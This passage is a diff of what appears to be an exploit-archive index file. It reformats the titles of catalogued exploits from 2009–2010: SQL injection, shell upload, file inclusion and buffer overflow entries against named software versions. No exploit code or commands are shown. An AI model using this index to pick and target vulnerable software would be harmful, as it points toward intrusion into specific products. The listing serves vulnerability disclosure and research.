Scripting",2009-12-26,indoushka,php,webapps,0 +10688,platforms/php/webapps/10688.txt,"FlatPress - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10689,platforms/php/webapps/10689.txt,"file upload Ar Version - Upload Shell",2009-12-26,indoushka,php,webapps,0 10690,platforms/php/webapps/10690.txt,"IMG2ASCII - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10691,platforms/php/webapps/10691.txt,"EZPX My photoblog 1.2 - Upload Shell",2009-12-26,indoushka,php,webapps,0 @@ -9928,7 +9928,7 @@ id,file,description,date,author,platform,type,port 10707,platforms/php/webapps/10707.txt,"osCommerce 2.2rc2a - Bypass/Create and Download Backup",2009-12-26,indoushka,php,webapps,0 10708,platforms/php/webapps/10708.txt,"MyShoutPro 1.2 Final - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10710,platforms/php/webapps/10710.txt,"Green Desktiny Customer Support Helpdesk 2.3.1 - SQL Injection",2009-12-26,kaMtiEz,php,webapps,0 -10711,platforms/php/webapps/10711.txt,"PHPAUCTION Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 +10711,platforms/php/webapps/10711.txt,"PHPAUCTION - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10712,platforms/php/webapps/10712.txt,"Nuked-Klan SP4 - Remote File Inclusion",2009-12-26,indoushka,php,webapps,0 10713,platforms/asp/webapps/10713.txt,"Esinti Web Design Gold Defter Database Disclosure",2009-12-26,LionTurk,asp,webapps,0 10715,platforms/windows/remote/10715.rb,"HP Application Recovery Manager - (OmniInet.exe) Buffer Overflow",2009-12-26,EgiX,windows,remote,5555 @@ -9964,12 +9964,12 @@ id,file,description,date,author,platform,type,port 10748,platforms/windows/local/10748.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow Exploit (Metasploit) (1)",2009-12-27,dijital1,windows,local,0 10750,platforms/php/webapps/10750.txt,"Mambo Component Material Suche 1.0 - SQL Injection",2009-12-27,Gamoscu,php,webapps,0 10751,platforms/php/webapps/10751.txt,"Koobi Pro 6.1 - Gallery (img_id)",2009-12-27,BILGE_KAGAN,php,webapps,0 -10752,platforms/multiple/webapps/10752.txt,"Yonja Remote File Upload",2009-12-28,indoushka,multiple,webapps,80 +10752,platforms/multiple/webapps/10752.txt,"Yonja - Remote File Upload",2009-12-28,indoushka,multiple,webapps,80 10753,platforms/multiple/webapps/10753.txt,"ASP Simple Blog 3.0 - Upload shell",2009-12-28,indoushka,multiple,webapps,80 10754,platforms/multiple/webapps/10754.txt,"Joomla Component com_if_nexus - Remote File Inclusion",2009-12-28,FL0RiX,multiple,webapps,80 10755,platforms/linux/webapps/10755.txt,"egegen turkish script - SQL Injection",2009-12-28,FormatXformat,linux,webapps,80 10756,platforms/linux/webapps/10756.txt,"MySimpleFileUploader 1.6 - Upload Shell",2009-12-28,FormatXformat,linux,webapps,80 -10757,platforms/linux/webapps/10757.txt,"PHP Forum ohne My SQL Remote File Upload",2009-12-28,"wlhaan hacker",linux,webapps,80 +10757,platforms/linux/webapps/10757.txt,"PHP Forum ohne My SQL - Remote File Upload",2009-12-28,"wlhaan hacker",linux,webapps,80 10758,platforms/php/webapps/10758.txt,"Calendar Express 2.0 - SQL Injection",2009-12-28,BAYBORA,php,webapps,0 10759,platforms/windows/local/10759.pl,"M.J.M. Quick Player 1.2 - Stack BOF",2009-12-28,corelanc0d3r,windows,local,0 10760,platforms/php/webapps/10760.txt,"Joomla Component com_calendario - Blind SQL Injection",2009-12-28,Mr.tro0oqy,php,webapps,0 @@ -9977,14 +9977,14 @@ id,file,description,date,author,platform,type,port 10763,platforms/php/webapps/10763.txt,"Dren's PHP Uploader - Remote File Upload",2009-12-28,"Cyb3r IntRue",php,webapps,0 10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - SEH (0Day)",2009-12-29,Lincoln,windows,remote,6660 10767,platforms/asp/webapps/10767.txt,"jgbbs-3.0beta1 - DB Download",2009-12-29,indoushka,asp,webapps,0 -10770,platforms/asp/webapps/10770.txt,"PSnews DB Download",2009-12-29,indoushka,asp,webapps,0 +10770,platforms/asp/webapps/10770.txt,"PSnews - DB Download",2009-12-29,indoushka,asp,webapps,0 10771,platforms/asp/webapps/10771.txt,"QuickEStore 7.9 - SQL Injection / Path Diclosure Download",2009-12-29,indoushka,asp,webapps,0 10772,platforms/asp/webapps/10772.txt,"AspBB - Active Server Page Bulletin Board DB Download",2009-12-29,indoushka,asp,webapps,0 -10773,platforms/asp/webapps/10773.txt,"Futility Forum 1.0 Revamp DB Download",2009-12-29,indoushka,asp,webapps,0 +10773,platforms/asp/webapps/10773.txt,"Futility Forum 1.0 Revamp - DB Download",2009-12-29,indoushka,asp,webapps,0 10774,platforms/asp/webapps/10774.txt,"htmlArea 2.03 - DB Download",2009-12-29,indoushka,asp,webapps,0 -10775,platforms/asp/webapps/10775.txt,"Uguestbook DB Download",2009-12-29,indoushka,asp,webapps,0 +10775,platforms/asp/webapps/10775.txt,"Uguestbook - DB Download",2009-12-29,indoushka,asp,webapps,0 10776,platforms/asp/webapps/10776.txt,"BaalASP 2.0 - DB Download",2009-12-29,indoushka,asp,webapps,0 -10777,platforms/asp/webapps/10777.txt,"Fully Functional ASP Forum 1.0 DB Download",2009-12-29,indoushka,asp,webapps,0 +10777,platforms/asp/webapps/10777.txt,"Fully Functional ASP Forum 1.0 - DB Download",2009-12-29,indoushka,asp,webapps,0 10778,platforms/asp/webapps/10778.txt,"makit news/blog poster 3.1 - DB Download",2009-12-29,indoushka,asp,webapps,0 10779,platforms/php/webapps/10779.txt,"DirectAdmin 1.34.0 - CSRF Create Administrator",2009-12-29,SecurityRules,php,webapps,0 10780,platforms/asp/webapps/10780.txt,"ASP Battle Blog - DB Download",2009-12-29,indoushka,asp,webapps,0 @@ -10000,8 +10000,8 @@ id,file,description,date,author,platform,type,port 10792,platforms/hardware/webapps/10792.txt,"My Book World Edition NAS - Multiple Vulnerabilities",2009-12-30,emgent,hardware,webapps,80 10793,platforms/php/webapps/10793.txt,"RoseOnlineCMS 3 B1 - (admin) Local File Inclusion",2009-12-30,"cr4wl3r ",php,webapps,0 10794,platforms/asp/webapps/10794.txt,"WEB Calendar - Remote Database Disclosure",2009-12-30,RENO,asp,webapps,0 -10795,platforms/asp/webapps/10795.txt,"ezguestbook Remote Database Disclosure",2009-12-30,RENO,asp,webapps,0 -10796,platforms/asp/webapps/10796.txt,"ezscheduler Remote Database Disclosure",2009-12-30,RENO,asp,webapps,0 +10795,platforms/asp/webapps/10795.txt,"ezguestbook - Remote Database Disclosure",2009-12-30,RENO,asp,webapps,0 +10796,platforms/asp/webapps/10796.txt,"ezscheduler - Remote Database Disclosure",2009-12-30,RENO,asp,webapps,0 10797,platforms/windows/local/10797.py,"Quick Player 1.2 - Unicode Buffer Overflow Exploit",2009-12-30,mr_me,windows,local,0 10798,platforms/php/webapps/10798.txt,"iDevAffiliate 4.0 - Backup",2009-12-30,indoushka,php,webapps,0 10800,platforms/php/webapps/10800.txt,"I-RATER Basic Shell Upload",2009-12-30,indoushka,php,webapps,0 @@ -10010,10 +10010,10 @@ id,file,description,date,author,platform,type,port 10805,platforms/php/webapps/10805.txt,"diesel job site 1.4 - Multiple Vulnerabilities",2009-12-30,indoushka,php,webapps,0 10806,platforms/php/webapps/10806.txt,"LiveZilla 3.1.8.3 - XSS",2009-12-30,MaXe,php,webapps,0 10807,platforms/php/webapps/10807.txt,"XOOPS Module dictionary 2.0.18 - (detail.php) SQL Injection",2009-12-30,Palyo34,php,webapps,0 -10808,platforms/php/webapps/10808.txt,"PHP-Fusion Mod avatar_studio LFI",2009-12-30,bonobug,php,webapps,0 +10808,platforms/php/webapps/10808.txt,"PHP-Fusion Mod avatar_studio - LFI",2009-12-30,bonobug,php,webapps,0 10809,platforms/php/webapps/10809.txt,"I-Escorts Directory - (country_escorts.php country_id) SQL Injection",2009-12-30,R3d-D3V!L,php,webapps,0 10810,platforms/php/webapps/10810.txt,"FlashChat 3.9.3.1 - PHP info",2009-12-30,indoushka,php,webapps,0 -10811,platforms/php/webapps/10811.txt,"Joomla.Tutorials GHDB: Apache directory listing Download",2009-12-30,indoushka,php,webapps,0 +10811,platforms/php/webapps/10811.txt,"Joomla com_intuit - Apache directory listing Download",2009-12-30,indoushka,php,webapps,0 10812,platforms/php/webapps/10812.txt,"WHOISCART Scripting",2009-12-30,HAQIQ20,php,webapps,0 10813,platforms/php/webapps/10813.txt,"ArticleLive PHP 2005.0.0 - Cross-Site Scripting",2009-12-30,indoushka,php,webapps,0 10816,platforms/php/webapps/10816.txt,"Aptgp.1.3.0c - Cross-Site Scripting",2009-12-30,indoushka,php,webapps,0 @@ -10028,7 +10028,7 @@ id,file,description,date,author,platform,type,port 10826,platforms/php/dos/10826.sh,"Drupal 6.16 / 5.21 - DoS (0Day)",2009-12-31,emgent,php,dos,80 10827,platforms/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 - SEH Exploit",2009-12-30,"Sébastien Duquette",windows,local,0 10828,platforms/php/webapps/10828.txt,"vBulletin ads_saed 1.5 - (bnnr.php) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 -10829,platforms/php/dos/10829.pl,"vBulletin Denial of Service",2009-12-30,R3d-D3V!L,php,dos,0 +10829,platforms/php/dos/10829.pl,"vBulletin - Denial of Service",2009-12-30,R3d-D3V!L,php,dos,0 10830,platforms/php/webapps/10830.txt,"Azadi Network - (page) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 10831,platforms/php/webapps/10831.txt,"e-topbiz banner exchange php - (Auth Bypass) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 10832,platforms/php/webapps/10832.txt,"e-topbiz Slide Popups 1 php - (Auth Bypass) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 @@ -10049,15 +10049,15 @@ id,file,description,date,author,platform,type,port 10850,platforms/php/webapps/10850.txt,"HLstatsX 1.65 - SQL Injection",2009-12-31,bnc,php,webapps,0 10861,platforms/php/webapps/10861.txt,"Discuz 1.03 - SQL Injection",2009-12-31,indoushka,php,webapps,0 10869,platforms/php/webapps/10869.txt,"PhotoDiary 1.3 - (lng) LFI",2009-12-31,cOndemned,php,webapps,0 -10870,platforms/multiple/dos/10870.html,"Opera 10.10 Status Bar Obfuscation",2009-12-31,"599eme Man",multiple,dos,0 +10870,platforms/multiple/dos/10870.html,"Opera 10.10 - Status Bar Obfuscation",2009-12-31,"599eme Man",multiple,dos,0 10871,platforms/php/webapps/10871.txt,"Freewebscript'z Games - (Auth Bypass) SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10872,platforms/php/webapps/10872.txt,"Pre ADS Portal - (cid) SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10873,platforms/php/webapps/10873.txt,"Myiosoft EasyGallery - (catid) Blind SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10874,platforms/php/webapps/10874.txt,"Pre News Manager - (nid) SQL Injection",2009-12-31,"Hussin X",php,webapps,0 -10876,platforms/php/webapps/10876.txt,"PHP-MySQL-Quiz SQL Injection",2009-12-31,"Hussin X",php,webapps,0 +10876,platforms/php/webapps/10876.txt,"PHP-MySQL-Quiz - SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10877,platforms/php/webapps/10877.txt,"php-addressbook 3.1.5 - (edit.php) SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10878,platforms/php/webapps/10878.txt,"Invision Power Board (Trial) 2.0.4 - Backup",2009-12-31,indoushka,php,webapps,0 -10879,platforms/windows/dos/10879.html,"Google Chrome 3.0195.38 Status Bar Obfuscation",2009-12-31,"599eme Man",windows,dos,0 +10879,platforms/windows/dos/10879.html,"Google Chrome 3.0195.38 - Status Bar Obfuscation",2009-12-31,"599eme Man",windows,dos,0 10880,platforms/php/webapps/10880.php,"bbScript 1.1.2.1 - (id) Blind SQL Injection",2009-12-31,cOndemned,php,webapps,0 10881,platforms/windows/dos/10881.pl,"Apollo Player 37.0.0.0 - (.aap) BoF DoS",2009-12-31,jacky,windows,dos,0 10882,platforms/php/webapps/10882.txt,"Kayako eSupport 3.04.10 - XSS / CSRF",2009-12-31,"D3V!L FUCKER",php,webapps,0 @@ -10097,7 +10097,7 @@ id,file,description,date,author,platform,type,port 10944,platforms/php/webapps/10944.txt,"Joomla Component com_bfsurvey_basic - SQL Injection",2010-01-03,FL0RiX,php,webapps,0 10945,platforms/php/webapps/10945.php,"Joomla Component com_bfsurvey_pro - (catid) Blind SQL Injection",2010-01-03,FL0RiX,php,webapps,0 10946,platforms/php/webapps/10946.txt,"Joomla Component com_bfsurvey - LFI",2010-01-03,FL0RiX,php,webapps,0 -10947,platforms/hardware/dos/10947.txt,"Facebook for iPhone persistent XSS DoS",2010-01-03,marco_,hardware,dos,0 +10947,platforms/hardware/dos/10947.txt,"Facebook for iPhone - persistent XSS DoS",2010-01-03,marco_,hardware,dos,0 10948,platforms/php/webapps/10948.txt,"Joomla Component com_abbrev - Local File Inclusion",2010-01-03,FL0RiX,php,webapps,0 10949,platforms/php/webapps/10949.txt,"Joomla Component com_countries - SQL Injection",2010-01-03,FL0RiX,php,webapps,0 10950,platforms/php/webapps/10950.txt,"Joomla Component com_tpjobs - Blind SQL Injection",2010-01-03,FL0RiX,php,webapps,0 @@ -10130,8 +10130,8 @@ id,file,description,date,author,platform,type,port 11002,platforms/php/webapps/11002.txt,"ImagoScripts Deviant Art Clone SQL Injection",2010-01-04,alnjm33,php,webapps,0 11003,platforms/php/webapps/11003.txt,"LightOpen CMS 0.1 - Remote File Inclusion (smarty.php)",2010-01-04,"Zer0 Thunder",php,webapps,0 11005,platforms/asp/webapps/11005.txt,"KMSoft Guestbook 1.0 - Database Disclosure",2010-01-04,LionTurk,asp,webapps,0 -11008,platforms/asp/webapps/11008.txt,"YP Portal MS-Pro Surumu 1.0 DB Download",2010-01-05,indoushka,asp,webapps,0 -11009,platforms/multiple/dos/11009.pl,"Novell Netware CIFS And AFP Remote Memory Consumption DoS",2010-01-05,"Francis Provencher",multiple,dos,0 +11008,platforms/asp/webapps/11008.txt,"YP Portal MS-Pro Surumu 1.0 - DB Download",2010-01-05,indoushka,asp,webapps,0 +11009,platforms/multiple/dos/11009.pl,"Novell Netware - CIFS And AFP Remote Memory Consumption DoS",2010-01-05,"Francis Provencher",multiple,dos,0 11010,platforms/windows/local/11010.rb,"PlayMeNow 7.3 / 7.4 - Buffer Overflow (Metasploit)",2010-01-06,blake,windows,local,0 11012,platforms/php/webapps/11012.txt,"ITaco Group ITaco.biz - (view_news) SQL Injection",2010-01-06,Err0R,php,webapps,0 11013,platforms/php/webapps/11013.txt,"PHPDirector Game Edition 0.1 - (LFI/SQLi/XSS) Multiple Vulnerabilities",2010-01-06,"Zer0 Thunder",php,webapps,0 @@ -10139,24 +10139,24 @@ id,file,description,date,author,platform,type,port 11015,platforms/asp/webapps/11015.txt,"Lebi soft Ziyaretci Defteri 7.5 - DB Download",2010-01-06,indoushka,asp,webapps,0 11016,platforms/asp/webapps/11016.txt,"Net Gitar Shop 1.0 - DB Download",2010-01-06,indoushka,asp,webapps,0 11017,platforms/php/webapps/11017.txt,"PHPDug 2.0.0 - Cross-Site Scripting",2010-01-06,indoushka,php,webapps,0 -11018,platforms/asp/webapps/11018.txt,"VP-ASP Shopping Cart 7.0 DB Download",2010-01-06,indoushka,asp,webapps,0 +11018,platforms/asp/webapps/11018.txt,"VP-ASP Shopping Cart 7.0 - DB Download",2010-01-06,indoushka,asp,webapps,0 11019,platforms/php/webapps/11019.txt,"MobPartner Counter - Remote File Upload",2010-01-06,"wlhaan hacker",php,webapps,0 11020,platforms/windows/dos/11020.pl,"GOM Audio - Local Crash PoC",2010-01-06,applicationlayer,windows,dos,0 11021,platforms/windows/dos/11021.txt,"Flashget 3.x - IEHelper Remote Exec PoC (0Day)",2010-01-06,superli,windows,dos,0 -11022,platforms/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - (Post Auth) Remote BoF Exploit",2010-01-06,"His0k4 and Simo36",novell,remote,0 -11023,platforms/asp/webapps/11023.txt,"Erolife AjxGaleri VT Database Disclosure",2010-01-06,LionTurk,asp,webapps,0 +11022,platforms/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - (Post-Auth) Remote BoF Exploit",2010-01-06,"His0k4 and Simo36",novell,remote,0 +11023,platforms/asp/webapps/11023.txt,"Erolife AjxGaleri VT - Database Disclosure",2010-01-06,LionTurk,asp,webapps,0 11024,platforms/php/webapps/11024.txt,"Joomla Component com_perchagallery - SQL Injection",2010-01-06,FL0RiX,php,webapps,0 -11025,platforms/php/webapps/11025.txt,"AWCM Database Disclosure",2010-01-06,alnjm33,php,webapps,0 +11025,platforms/php/webapps/11025.txt,"AWCM - Database Disclosure",2010-01-06,alnjm33,php,webapps,0 11026,platforms/php/webapps/11026.php,"com_jembed - (catid) Blind SQL Injection",2010-01-06,FL0RiX,php,webapps,0 11027,platforms/windows/remote/11027.pl,"Apple QuickTime 7.2/7.3 - RTSP BoF (Perl)",2010-01-06,jacky,windows,remote,0 11028,platforms/php/webapps/11028.txt,"Docebo 3.6.0.2 (stable) - Local File Inclusion",2010-01-06,"Zer0 Thunder",php,webapps,0 -11029,platforms/multiple/local/11029.txt,"DirectAdmin 1.33.6 Symlink Permission Bypass",2010-01-06,alnjm33,multiple,local,0 +11029,platforms/multiple/local/11029.txt,"DirectAdmin 1.33.6 - Symlink Permission Bypass",2010-01-06,alnjm33,multiple,local,0 11030,platforms/hardware/webapps/11030.txt,"D-LINK DKVM-IP8 - XSS",2010-01-06,POPCORN,hardware,webapps,0 11031,platforms/php/webapps/11031.txt,"Milonic News - (viewnews) SQL Injection",2010-01-06,Err0R,php,webapps,0 11033,platforms/php/webapps/11033.txt,"Joomla Component com_kk - Blind SQL Injection",2010-01-06,Pyske,php,webapps,0 11034,platforms/windows/dos/11034.txt,"Microsoft HTML Help Compiler (hhc.exe) - BoF PoC",2010-01-06,s4squatch,windows,dos,0 11035,platforms/php/webapps/11035.txt,"Joomla Component com_king - Blind SQL Injection",2010-01-06,Pyske,php,webapps,0 -11036,platforms/php/webapps/11036.txt,"RoundCube Webmail Multiple Vulerabilities",2010-01-06,"j4ck and Globus",php,webapps,0 +11036,platforms/php/webapps/11036.txt,"RoundCube Webmail - Multiple Vulerabilities",2010-01-06,"j4ck and Globus",php,webapps,0 11043,platforms/hardware/dos/11043.txt,"Total Multimedia Features - DoS PoC for Sony Ericsson Phones",2010-01-06,Aodrulez,hardware,dos,0 11044,platforms/linux/dos/11044.txt,"Gnome Panel 2.28.0 - Denial of Service PoC (0Day)",2010-01-06,"Pietro Oliva",linux,dos,0 11045,platforms/php/webapps/11045.txt,"SpawCMS Editor - Shell Upload",2010-01-06,j4ck,php,webapps,0 @@ -10185,7 +10185,7 @@ id,file,description,date,author,platform,type,port 11081,platforms/php/webapps/11081.txt,"TermiSBloG 1.0 - SQL Injection(s)",2010-01-10,Cyber_945,php,webapps,0 11082,platforms/php/webapps/11082.txt,"PHPCalendars - Multiple Vulnerabilities",2010-01-10,LionTurk,php,webapps,0 11083,platforms/php/webapps/11083.txt,"phpMDJ 1.0.3 - SQL Injection",2010-01-10,"k4cp3r and Ablus",php,webapps,0 -11084,platforms/windows/dos/11084.pl,"Real Player Local Crash PoC",2010-01-10,"D3V!L FUCKER",windows,dos,0 +11084,platforms/windows/dos/11084.pl,"Real Player - Local Crash PoC",2010-01-10,"D3V!L FUCKER",windows,dos,0 11085,platforms/php/webapps/11085.txt,"Alex Guestbook - Multiple Vulnerabilities",2010-01-11,LionTurk,php,webapps,0 11086,platforms/php/webapps/11086.txt,"Joomla Component com_dashboard - Directory Traversal",2010-01-10,FL0RiX,php,webapps,0 11087,platforms/php/webapps/11087.txt,"ZeeWays Script - SQL Injection",2010-01-10,SyRiAn_34G13,php,webapps,0 @@ -10229,8 +10229,8 @@ id,file,description,date,author,platform,type,port 11142,platforms/multiple/dos/11142.txt,"Multiple Media Player - HTTP DataHandler Overflow (Itunes & Quicktime etc)",2010-01-15,Dr_IDE,multiple,dos,0 11145,platforms/windows/dos/11145.pl,"OtsTurntables Free 1.00.047 - SEH Overwrite PoC",2010-01-15,Darkb0x,windows,dos,0 11146,platforms/windows/local/11146.py,"BS.Player 2.51 - SEH Overwrite",2010-01-15,"Mert SARICA",windows,local,0 -11147,platforms/php/webapps/11147.txt,"Max's File Uploader Shell Upload",2010-01-15,S2K9,php,webapps,0 -11148,platforms/php/webapps/11148.txt,"PonVFTP Bypass and Shell Upload",2010-01-15,S2K9,php,webapps,0 +11147,platforms/php/webapps/11147.txt,"Max's File Uploader - Shell Upload",2010-01-15,S2K9,php,webapps,0 +11148,platforms/php/webapps/11148.txt,"PonVFTP - Bypass / Shell Upload",2010-01-15,S2K9,php,webapps,0 11149,platforms/windows/dos/11149.c,"Sub Station Alpha 4.08 - (.rt) Local Buffer Overflow PoC",2010-01-15,"fl0 fl0w",windows,dos,0 11150,platforms/windows/dos/11150.txt,"Aqua Real 1.0 / 2.0 - Local Crash PoC",2010-01-15,R3d-D3V!L,windows,dos,0 11151,platforms/windows/remote/11151.html,"Microsoft Internet Explorer - wshom.ocx ActiveX Control Remote Code Execution",2010-01-16,"germaya_x and D3V!L FUCKER",windows,remote,0 @@ -10249,7 +10249,7 @@ id,file,description,date,author,platform,type,port 11166,platforms/php/webapps/11166.txt,"Uploader by CeleronDude 5.3.0 - Upload",2010-01-17,Stink',php,webapps,0 11167,platforms/windows/remote/11167.py,"Microsoft Internet Explorer 6 - Aurora Exploit",2010-01-17,"Ahmed Obied",windows,remote,0 11168,platforms/php/webapps/11168.txt,"Joomla Component com_pc - LFI",2010-01-17,Pyske,php,webapps,0 -11169,platforms/php/webapps/11169.txt,"Max's Image Uploader Shell Upload",2010-01-17,indoushka,php,webapps,0 +11169,platforms/php/webapps/11169.txt,"Max's Image Uploader - Shell Upload",2010-01-17,indoushka,php,webapps,0 11171,platforms/windows/local/11171.pl,"Audiotran 1.4.1 - Direct RET BoF",2010-01-17,jacky,windows,local,0 11172,platforms/windows/remote/11172.html,"Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Exec PoC (0Day)",2010-01-17,superli,windows,remote,0 11173,platforms/windows/remote/11173.txt,"TrendMicro Web-Deployment ActiveX - Remote Exec PoC (0Day)",2010-01-17,superli,windows,remote,0 @@ -10283,7 +10283,7 @@ id,file,description,date,author,platform,type,port 11209,platforms/windows/dos/11209.pl,"jetAudio 8.0.0.2 Basic (.asx) - Local Crash Exploit",2010-01-21,"cr4wl3r ",windows,dos,0 11210,platforms/windows/remote/11210.rb,"EFS Easy Chat Server - Universal BOF-SEH (Metasploit)",2010-01-21,fb1h2s,windows,remote,0 11211,platforms/multiple/webapps/11211.txt,"cPanel - HTTP Response Splitting",2010-01-21,Trancer,multiple,webapps,0 -11212,platforms/asp/webapps/11212.txt,"eWebeditor Directory Traversal",2010-01-21,anonymous,asp,webapps,0 +11212,platforms/asp/webapps/11212.txt,"eWebeditor - Directory Traversal",2010-01-21,anonymous,asp,webapps,0 11213,platforms/php/webapps/11213.txt,"Joomla Component com_book - SQL Injection",2010-01-21,Evil-Cod3r,php,webapps,0 11214,platforms/windows/dos/11214.html,"Windows Live Messenger 2009 - ActiveX Heap Overflow PoC",2010-01-21,SarBoT511,windows,dos,0 11215,platforms/windows/webapps/11215.txt,"SHOUTcast Server 1.9.8/Win32 - CSRF",2010-01-21,"cp77fk4r ",windows,webapps,0 @@ -10319,7 +10319,7 @@ id,file,description,date,author,platform,type,port 11255,platforms/windows/local/11255.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow Exploit",2010-01-25,Dz_attacker,windows,local,0 11256,platforms/windows/local/11256.pl,"Winamp 5.572 - whatsnew.txt Local Buffer Overflow Exploit (Windows XP SP3 DE)",2010-01-25,NeoCortex,windows,local,0 11257,platforms/windows/remote/11257.rb,"AOL 9.5 - Phobos.Playlist 'Import()' Buffer Overflow Exploit (Metasploit)",2010-01-25,Trancer,windows,remote,0 -11258,platforms/php/webapps/11258.html,"Status2k Remote Add Admin Exploit",2010-01-25,alnjm33,php,webapps,0 +11258,platforms/php/webapps/11258.html,"Status2k - Remote Add Admin Exploit",2010-01-25,alnjm33,php,webapps,0 11260,platforms/windows/dos/11260.txt,"AIC Audio Player 1.4.1.587 - Local Crash PoC",2010-01-26,b0telh0,windows,dos,0 11261,platforms/php/webapps/11261.txt,"UGiA PHP UPLOADER 0.2 - Shell Upload",2010-01-26,indoushka,php,webapps,0 11262,platforms/php/webapps/11262.php,"Joomla 1.5.12 - connect back Exploit",2010-01-26,"Nikola Petrov",php,webapps,0 @@ -10340,7 +10340,7 @@ id,file,description,date,author,platform,type,port 11280,platforms/php/webapps/11280.txt,"Joomla Component jVideoDirect - Blind SQL Injection",2010-01-28,B-HUNT3|2,php,webapps,0 11281,platforms/windows/local/11281.c,"Rising AntiVirus 2008/2009/2010 - Local Privilege Escalation Exploit",2010-01-28,Dlrow,windows,local,0 11282,platforms/php/webapps/11282.txt,"Joomla Component com_ccnewsletter - LFI",2010-01-28,"AtT4CKxT3rR0r1ST ",php,webapps,0 -11284,platforms/php/webapps/11284.txt,"PHP Product Catalog CSRF Change Administrator Password",2010-01-29,bi0,php,webapps,0 +11284,platforms/php/webapps/11284.txt,"PHP Product Catalog - CSRF Change Administrator Password",2010-01-29,bi0,php,webapps,0 11286,platforms/php/webapps/11286.txt,"Joomla JReservation - Blind SQL Injection",2010-01-29,B-HUNT3|2,php,webapps,0 11287,platforms/php/webapps/11287.txt,"Joomla Component JE Quiz - Blind SQL Injection",2010-01-29,B-HUNT3|2,php,webapps,0 11288,platforms/multiple/dos/11288.py,"Wireshark 1.2.5 - LWRES getaddrbyname Stack BOF",2010-01-29,babi,multiple,dos,0 @@ -10357,7 +10357,7 @@ id,file,description,date,author,platform,type,port 11299,platforms/php/webapps/11299.txt,"crownweb - (page.cfm) SQL Injection",2010-01-31,"AtT4CKxT3rR0r1ST ",php,webapps,0 11300,platforms/php/webapps/11300.txt,"Creative SplashWorks-SplashSite - (page.php) Blind SQL Injection",2010-01-31,"AtT4CKxT3rR0r1ST ",php,webapps,0 11301,platforms/php/webapps/11301.txt,"Maian Greetings 2.1 - Shell Upload",2010-01-31,indoushka,php,webapps,0 -11303,platforms/php/webapps/11303.txt,"Saman Portal SQL Injection",2010-01-31,"Pouya Daneshmand",php,webapps,0 +11303,platforms/php/webapps/11303.txt,"Saman Portal - SQL Injection",2010-01-31,"Pouya Daneshmand",php,webapps,0 11305,platforms/php/webapps/11305.txt,"ShoutCMS - (content.php) Blind SQL Injection",2010-02-01,"Zero Cold",php,webapps,0 11306,platforms/php/webapps/11306.txt,"Evernew Free Joke Script - (viewjokes.php) SQL Injection",2010-02-01,"Hamza 'MizoZ' N.",php,webapps,0 11307,platforms/php/webapps/11307.txt,"Joomla (Job Component) - SQL Injection",2010-02-01,B-HUNT3|2,php,webapps,0 @@ -10414,7 +10414,7 @@ id,file,description,date,author,platform,type,port 11361,platforms/asp/webapps/11361.txt,"fipsForum 2.6 - Remote Database Disclosure",2010-02-09,"ViRuSMaN ",asp,webapps,0 11363,platforms/windows/dos/11363.c,"UltraISO 9.3.6.2750 - Local Buffer Overflow PoC (0Day)",2010-02-09,"fl0 fl0w",windows,dos,0 11364,platforms/multiple/local/11364.txt,"LDAP Injection PoC",2010-02-09,"mc2_s3lector ",multiple,local,0 -11365,platforms/php/webapps/11365.txt,"CPA Site Solutions Remote File Upload",2010-02-09,R3VAN_BASTARD,php,webapps,0 +11365,platforms/php/webapps/11365.txt,"CPA Site Solutions - Remote File Upload",2010-02-09,R3VAN_BASTARD,php,webapps,0 11366,platforms/php/webapps/11366.txt,"Newsletter Tailor Database Backup Dump",2010-02-09,"ViRuSMaN ",php,webapps,0 11367,platforms/php/webapps/11367.txt,"Newsletter Tailor - (Auth Bypass) SQL Injection",2010-02-09,"ViRuSMaN ",php,webapps,0 11368,platforms/php/webapps/11368.txt,"Yes Solutions - Webapp SQL Injection",2010-02-09,"HackXBack ",php,webapps,0 @@ -10439,7 +10439,7 @@ id,file,description,date,author,platform,type,port 11396,platforms/php/webapps/11396.txt,"vBulletin 2.3.x - SQL Injection",2010-02-11,ROOT_EGY,php,webapps,0 11397,platforms/php/dos/11397.txt,"PHP Captcha Security Images - DoS",2010-02-11,"cp77fk4r ",php,dos,0 11398,platforms/php/webapps/11398.txt,"GameRoom Script - Admin Bypass / File Upload",2010-02-11,JIKO,php,webapps,0 -11399,platforms/php/webapps/11399.txt,"myPHP Guestbook 2.0.4 Database Backup Dump",2010-02-11,"ViRuSMaN ",php,webapps,0 +11399,platforms/php/webapps/11399.txt,"myPHP Guestbook 2.0.4 - Database Backup Dump",2010-02-11,"ViRuSMaN ",php,webapps,0 11400,platforms/windows/local/11400.py,"Radasm 2.2.1.6 - (.rap) Universal Buffer Overflow Exploit",2010-02-11,Dz_attacker,windows,local,0 11401,platforms/php/webapps/11401.txt,"CD Rentals Script - SQL Injection",2010-02-11,"Don Tukulesto",php,webapps,0 11402,platforms/php/webapps/11402.txt,"Books/eBooks Rental Software - SQL Injection",2010-02-11,"Don Tukulesto",php,webapps,0 @@ -10465,7 +10465,7 @@ id,file,description,date,author,platform,type,port 11427,platforms/hardware/dos/11427.txt,"Nokia Symbian OS 3rd Edition - Multiple Web Browser Vulnerabilities",2010-02-12,"Nishant Das Patnaik",hardware,dos,0 11429,platforms/php/webapps/11429.txt,"Vito CMS - SQL Injection",2010-02-13,hacker@sr.gov.yu,php,webapps,0 11430,platforms/php/webapps/11430.txt,"southburn Web - (products.php) SQL Injection",2010-02-13,"AtT4CKxT3rR0r1ST ",php,webapps,0 